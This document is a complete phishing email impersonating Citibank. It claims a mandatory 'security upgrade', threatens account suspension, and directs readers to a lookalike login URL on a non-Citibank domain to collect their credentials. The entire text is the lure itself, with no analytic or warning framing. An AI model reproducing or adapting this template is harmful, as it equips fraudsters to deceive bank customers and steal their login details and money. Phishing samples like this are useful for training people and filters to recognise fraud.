 Additional Security Requirements Dear valued Citibank member, Citibank has changed security screening procedures for online banking, please follow the given instructions in order to comply with our additional security requirements. We require our members to enroll in our security upgrade, as part of our continuing commitment to protect your account and to reduce the instance of fraud on our website. After you submit the requested information, we will create a unique algorithm based on your personal computer, allowing us to recognize you in any future online banking sessions and thus immediately spotting any unauthorized access. By passing back and forth secret information that only you and Citibank know, you can feel even more secure with your online banking experience. We recognize you and you recognize us. If you could please take 5-10 minutes out of your online experience and enroll in the security upgrade, you will not run into any future problems with the Citibank online banking service. However, failure to meet our security requirements will result in your account suspension. If you received this notice and you are not the authorized account holder, please be aware that is a violation of the Citibank policy to represent oneself as another Citibank account holder. Such action may also be in violation of local, national, and/or international law. Citibank is committed to assist law enforcement with any inquires related to attempts to misappropriate personal information using the Internet. Information will be provided at the request of law enforcement agencies to ensure that perpetrators are prosecuted to the fullest extend of the law. Once you have enrolled in our security upgrade your pending Citibank account transactions will not be interrupted and will continue as normal. Please enroll in our security upgrade by clicking here. (http://web.da-us.citibank.com.d32b1937.com/citifi/scripts/login2/index.html?iv=D6C2D9426D706E73&token=28A31257BF196CB2D8305D9876A23B23EBD1FA2BF12C) Thank you for your time, Citibank Security Department. Citigroup Inc. 